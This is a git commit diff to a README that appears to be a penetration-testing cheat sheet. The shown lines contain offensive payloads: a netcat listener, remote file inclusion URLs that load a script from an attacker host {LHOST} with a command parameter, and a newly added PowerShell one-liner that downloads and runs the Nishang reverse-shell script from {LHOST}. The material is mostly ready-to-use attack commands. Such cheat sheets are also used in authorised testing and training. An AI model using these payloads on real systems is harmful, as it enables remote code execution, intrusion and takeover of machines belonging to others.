Update README.md

This commit is contained in:
Joe Totes
2022-10-18 09:47:40 -04:00
committed by GitHub
parent bca1e092d7
commit 35e3d772a5

View File

@@ -1739,6 +1739,9 @@ sudo nc -lnvp {PORT}
page.php?page=http://{LHOST}/evil.txt&cmd={command}
page.php?file=http://{LHOST}/evil.txt&cmd={command}
# Windows Nishang Reverse shell
powershell -c "IEX (New-Object Net.WebClient).DownloadString(\"http://{LHOST}/rev.ps1\"); Invoke-PowerShellTcp -Reverse -IPAddress {LHOST} -Port {LPORT} | powershell -noprofile"
# MSFVENOM Payloads
# Windows